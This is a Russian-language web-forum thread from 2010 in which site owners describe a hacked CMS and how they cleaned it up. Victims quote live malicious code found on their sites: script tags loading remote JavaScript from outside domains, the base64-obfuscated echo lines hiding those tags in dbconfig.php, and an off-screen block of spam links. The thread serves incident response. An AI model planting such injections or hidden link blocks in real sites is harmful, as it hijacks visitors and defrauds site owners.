alex4526 0 Опубликовано: 28 ноября 2010 Рассказать Опубликовано: 28 ноября 2010 Здравствуйте. Сегодня утром обнаружил, что оказывается на сайте уже 3 админа ( вместе со мною).Естественно принял меры. Двоих удалил. Поменял пароль ну и другие меры. Также обнаружил, что в шапке сайта прописан код <script language="JavaScript" type="text/javascript" charset="windows-1251" src="http://tizmax.ru/codes/iframe.php?id=90"></script><script language="JavaScript" charset="windows-1251" rel="nofollow" src="http://traffikk.biz/js/if.php?id=7514"></script>.Кто сталкивался с этой проблемой подскажите как удалить эту заразу. Заранее благодарен. Цитата Ссылка на сообщение Поделиться на других сайтах
zgr 72 Опубликовано: 28 ноября 2010 Рассказать Опубликовано: 28 ноября 2010 (изменено) Для начала смените пароли на хостинговую панель управления, БД, ФТП и админку. Больше тут ничего не посоветуешь. Удалите лишний код вручную из шаблонов. Изменено 28 ноября 2010 пользователем zgr Цитата Ссылка на сообщение Поделиться на других сайтах
alex4526 0 Опубликовано: 28 ноября 2010 Рассказать Опубликовано: 28 ноября 2010 Автор Для начала смените пароли на БД, ФТП и админку. Больше тут ничего не посоветуешь. Удалите лишний код вручную из шаблонов. Спасибо. Сейчас этим и занимаюсь. Про результаты отпишусь. Чувствую скоро те только у меня эта проблема возникнет. Цитата Ссылка на сообщение Поделиться на других сайтах
n0lik 75 Опубликовано: 28 ноября 2010 Рассказать Опубликовано: 28 ноября 2010 Спасибо. Сейчас этим и занимаюсь. Про результаты отпишусь. Чувствую скоро те только у меня эта проблема возникнет. И не забудьте поставить патчи http://dle-news.ru/bags/ 1 Цитата Ссылка на сообщение Поделиться на других сайтах
Azat868 2 Опубликовано: 28 ноября 2010 Рассказать Опубликовано: 28 ноября 2010 (изменено) Проверил бы файлы config.php,dbconfig.php а также все файлы через которые можно на главную вывести код, а также прошелся бы по ява скриптам, установил бы ZEOS ANTIVIRUS очень полезная вещь. Убрал бы права на запись, оставив 444, это ты уже сам догадаешься. Изменено 28 ноября 2010 пользователем Azat868 Цитата Ссылка на сообщение Поделиться на других сайтах
alex4526 0 Опубликовано: 28 ноября 2010 Рассказать Опубликовано: 28 ноября 2010 Автор Проверил бы файлы config.php,dbconfig.php а также все файлы через которые можно на главную вывести код, а также прошелся бы по ява скриптам, установил бы ZEOS ANTIVIRUS очень полезная вещь. Убрал бы права на запись, оставив 444, это ты уже сам догадаешься. Победа за нами. Код найден, удален. 1. В папке templates файл sistem.php вирус. 2. В файле dbconfig.php код echo base64_decode ('PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCIgdHlwZT0idGV4dC9qYXZhc2NyaXB0IiBjaGFyc2V0PSJ3aW5kb3dzLTEyNTEiIHNyYz0iaHR0cDovL3Rpem1heC5ydS9jb2Rlcy9pZnJhbWUucGhwP2lkPTkwIj48L3NjcmlwdD4='); echo base64_decode ('PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCIgY2hhcnNldD0id2luZG93cy0xMjUxIiByZWw9Im5vZm9sbG93IiBzcmM9Imh0dHA6Ly90cmFmZmlray5iaXovanMvaWYucGhwP2lkPTc1MTQiPjwvc2NyaXB0Pg=='); Вывод: Надо больше внимания уделять безопасности сайта. Цитата Ссылка на сообщение Поделиться на других сайтах
n0lik 75 Опубликовано: 28 ноября 2010 Рассказать Опубликовано: 28 ноября 2010 Вывод: Надо больше внимания уделять безопасности сайта. Надо вовремя обновляться и ставить патчи. Цитата Ссылка на сообщение Поделиться на других сайтах
Azat868 2 Опубликовано: 28 ноября 2010 Рассказать Опубликовано: 28 ноября 2010 (изменено) n0lik, В паблике к сожалению не все патчи, обычно узнав уязвимость, заплатка распространяется только среди своего круга лиц. Самый лучший способ по-моему это основательно поработать над chmod а также закрытием портов на хосте. В таком случае если даже есть залитый шелл на сайт, то смысл его использовать пропадает, если везде по умному расставлены права на запись. Изменено 28 ноября 2010 пользователем Azat868 Цитата Ссылка на сообщение Поделиться на других сайтах
hotdj 33 Опубликовано: 28 ноября 2010 Рассказать Опубликовано: 28 ноября 2010 n0lik, В паблике к сожалению не все патчи, обычно узнав уязвимость, заплатка распространяется только среди своего круга лиц. Самый лучший способ по-моему это основательно поработать над chmod а также закрытием портов на хосте. В таком случае если даже есть залитый шелл на сайт, то смысл его использовать пропадает, если везде по умному расставлены права на запись. скажите тогда как будет вести себя веб шелл в папке /engine/ если злоумышленник залил его по фтп? Тут уже никакие права доступа и прочее НЕПОМОЖЕТ, имхо права для доступа\записи это только часть. Защищаться нужно не от взломщика а нужно защищать своё железо от вирусов. не более. Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 5 995 Опубликовано: 28 ноября 2010 Рассказать Опубликовано: 28 ноября 2010 Победа за нами. Код найден, удален. Это не надолго, вам же написали, что ставьте патчи http://dle-news.ru/bags/ а вы этого до сих пор не сделали. Цитата Ссылка на сообщение Поделиться на других сайтах
Azat868 2 Опубликовано: 28 ноября 2010 Рассказать Опубликовано: 28 ноября 2010 hotdj, А если злоумышленник получил доступ к вашей почте? Цитата Ссылка на сообщение Поделиться на других сайтах
temius 1 Опубликовано: 29 ноября 2010 Рассказать Опубликовано: 29 ноября 2010 (изменено) таже фигня Наглые рожи прям в главную страницу вставили <html><div style="position:absolute;top:-1000px;left:-1000px"><a href="http://new.turbinist.ru/uploads/images/index.html">Главная</a><br><a href="http://mysite.ru/uploads/images/sitemap.html">Знакомства любовь секс</a><br><a href="http://mysite.ru/uploads/images/minsk-znakomstva-devushki.html">Минск знакомства девушки</a><br><a href="http://mysite.ru/uploads/images/krivoy-rog-intim-znakomstva.html">Кривой рог интим знакомства</a><br></div></html> </html> в папку upload залили папку image,а в ней не поверите .html файлов аж на 27 метров :D :D и все про порно)). точно прийдется код доступа в панель хостинга)) Изменено 29 ноября 2010 пользователем temius Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.